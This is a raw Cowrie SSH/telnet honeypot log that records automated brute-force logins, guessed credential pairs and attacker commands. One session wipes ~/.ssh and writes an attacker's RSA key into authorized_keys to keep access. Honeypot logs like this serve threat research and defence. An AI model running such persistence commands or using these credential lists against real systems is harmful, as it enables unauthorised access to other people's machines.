{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:38:58.258575Z","src_ip":"217.154.1.158","session":"49c6cd7a237c"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom123","message":"login attempt [tom/tom123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:38:58.301524Z","src_ip":"217.154.1.158","session":"49c6cd7a237c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:38:59.317505Z","src_ip":"217.154.1.158","session":"49c6cd7a237c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51836,"dst_ip":"1.2.3.4","dst_port":22,"session":"20cb6ecdcb5f","protocol":"ssh","message":"New connection: 217.72.205.35:51836 (1.2.3.4:22) [session: 20cb6ecdcb5f]","sensor":"my-vps","timestamp":"2025-08-26T19:39:03.900814Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:03.901909Z","src_ip":"217.72.205.35","session":"20cb6ecdcb5f"}
{"eventid":"cowrie.session.closed","duration":12.900801658630371,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:08.064257Z","src_ip":"113.229.80.250","session":"61174e2f9153"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":58190,"dst_ip":"1.2.3.4","dst_port":23,"session":"06dd4c4507c9","protocol":"telnet","message":"New connection: 113.229.80.250:58190 (1.2.3.4:23) [session: 06dd4c4507c9]","sensor":"my-vps","timestamp":"2025-08-26T19:39:08.303941Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":54462,"dst_ip":"1.2.3.4","dst_port":22,"session":"84b3cc7b7cc2","protocol":"ssh","message":"New connection: 217.154.1.158:54462 (1.2.3.4:22) [session: 84b3cc7b7cc2]","sensor":"my-vps","timestamp":"2025-08-26T19:39:15.886471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:39:15.887739Z","src_ip":"217.154.1.158","session":"84b3cc7b7cc2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:39:15.903784Z","src_ip":"217.154.1.158","session":"84b3cc7b7cc2"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:39:15.950382Z","src_ip":"217.154.1.158","session":"84b3cc7b7cc2"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:16.967328Z","src_ip":"217.154.1.158","session":"84b3cc7b7cc2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45914,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcb75ddc79c7","protocol":"ssh","message":"New connection: 212.227.125.160:45914 (1.2.3.4:22) [session: dcb75ddc79c7]","sensor":"my-vps","timestamp":"2025-08-26T19:39:19.737741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:39:19.759381Z","src_ip":"212.227.125.160","session":"dcb75ddc79c7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:39:19.896382Z","src_ip":"212.227.125.160","session":"dcb75ddc79c7"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword147","message":"login attempt [root/P@ssword147] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:39:20.448695Z","src_ip":"212.227.125.160","session":"dcb75ddc79c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:39:20.855462Z","src_ip":"212.227.125.160","session":"dcb75ddc79c7"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-26T19:39:20.856147Z","src_ip":"212.227.125.160","session":"dcb75ddc79c7"}
{"eventid":"cowrie.session.closed","duration":12.647016286849976,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:20.950870Z","src_ip":"113.229.80.250","session":"06dd4c4507c9"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":58353,"dst_ip":"1.2.3.4","dst_port":23,"session":"2ab0d7f4144a","protocol":"telnet","message":"New connection: 113.229.80.250:58353 (1.2.3.4:23) [session: 2ab0d7f4144a]","sensor":"my-vps","timestamp":"2025-08-26T19:39:21.085220Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:21.099131Z","src_ip":"212.227.125.160","session":"dcb75ddc79c7"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:21.185600Z","src_ip":"212.227.125.160","session":"dcb75ddc79c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36366,"dst_ip":"1.2.3.4","dst_port":23,"session":"cff8964272eb","protocol":"telnet","message":"New connection: 212.227.125.160:36366 (1.2.3.4:23) [session: cff8964272eb]","sensor":"my-vps","timestamp":"2025-08-26T19:39:28.293857Z"}
{"eventid":"cowrie.session.connect","src_ip":"179.107.107.139","src_port":7551,"dst_ip":"1.2.3.4","dst_port":22,"session":"023b2b5b0505","protocol":"ssh","message":"New connection: 179.107.107.139:7551 (1.2.3.4:22) [session: 023b2b5b0505]","sensor":"my-vps","timestamp":"2025-08-26T19:39:33.322129Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:39:33.322890Z","src_ip":"179.107.107.139","session":"023b2b5b0505"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":37908,"dst_ip":"1.2.3.4","dst_port":22,"session":"c60cdd2c4f41","protocol":"ssh","message":"New connection: 217.154.1.158:37908 (1.2.3.4:22) [session: c60cdd2c4f41]","sensor":"my-vps","timestamp":"2025-08-26T19:39:33.384180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:39:33.384989Z","src_ip":"217.154.1.158","session":"c60cdd2c4f41"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:39:33.400926Z","src_ip":"217.154.1.158","session":"c60cdd2c4f41"}
{"eventid":"cowrie.login.failed","username":"git","password":"git123","message":"login attempt [git/git123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:39:33.445215Z","src_ip":"217.154.1.158","session":"c60cdd2c4f41"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:39:33.556803Z","src_ip":"179.107.107.139","session":"023b2b5b0505"}
{"eventid":"cowrie.session.closed","duration":12.875686883926392,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:33.960834Z","src_ip":"113.229.80.250","session":"2ab0d7f4144a"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":58514,"dst_ip":"1.2.3.4","dst_port":23,"session":"a5c8244bc8ba","protocol":"telnet","message":"New connection: 113.229.80.250:58514 (1.2.3.4:23) [session: a5c8244bc8ba]","sensor":"my-vps","timestamp":"2025-08-26T19:39:34.137719Z"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:34.461174Z","src_ip":"217.154.1.158","session":"c60cdd2c4f41"}
{"eventid":"cowrie.login.success","username":"root","password":"Root123...","message":"login attempt [root/Root123...] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:39:34.536037Z","src_ip":"179.107.107.139","session":"023b2b5b0505"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:39:35.090473Z","src_ip":"179.107.107.139","session":"023b2b5b0505"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:39:35.090993Z","src_ip":"179.107.107.139","session":"023b2b5b0505"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:39:35.092515Z","src_ip":"179.107.107.139","session":"023b2b5b0505"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:35.329790Z","src_ip":"179.107.107.139","session":"023b2b5b0505"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:39:35.856690Z","src_ip":"179.107.107.139","session":"023b2b5b0505"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:39:35.857399Z","src_ip":"179.107.107.139","session":"023b2b5b0505"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:39:36.093120Z","src_ip":"179.107.107.139","session":"023b2b5b0505"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:36.094059Z","src_ip":"179.107.107.139","session":"023b2b5b0505"}
{"eventid":"cowrie.session.connect","src_ip":"179.107.107.139","src_port":35633,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea75be91c16c","protocol":"ssh","message":"New connection: 179.107.107.139:35633 (1.2.3.4:22) [session: ea75be91c16c]","sensor":"my-vps","timestamp":"2025-08-26T19:39:36.326882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:39:36.328577Z","src_ip":"179.107.107.139","session":"ea75be91c16c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:39:36.561809Z","src_ip":"179.107.107.139","session":"ea75be91c16c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:39:37.502847Z","src_ip":"179.107.107.139","session":"ea75be91c16c"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:38.739418Z","src_ip":"179.107.107.139","session":"ea75be91c16c"}
{"eventid":"cowrie.session.connect","src_ip":"179.107.107.139","src_port":4752,"dst_ip":"1.2.3.4","dst_port":22,"session":"35daaea94943","protocol":"ssh","message":"New connection: 179.107.107.139:4752 (1.2.3.4:22) [session: 35daaea94943]","sensor":"my-vps","timestamp":"2025-08-26T19:39:38.969123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:39:38.970095Z","src_ip":"179.107.107.139","session":"35daaea94943"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:39:39.204941Z","src_ip":"179.107.107.139","session":"35daaea94943"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:39:40.178092Z","src_ip":"179.107.107.139","session":"35daaea94943"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:40.414762Z","src_ip":"179.107.107.139","session":"35daaea94943"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:39:40.415606Z","src_ip":"179.107.107.139","session":"023b2b5b0505"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16226,"dst_ip":"1.2.3.4","dst_port":22,"session":"86da8c931290","protocol":"ssh","message":"New connection: 213.209.150.239:16226 (1.2.3.4:22) [session: 86da8c931290]","sensor":"my-vps","timestamp":"2025-08-26T19:39:43.768818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:39:43.769498Z","src_ip":"213.209.150.239","session":"86da8c931290"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-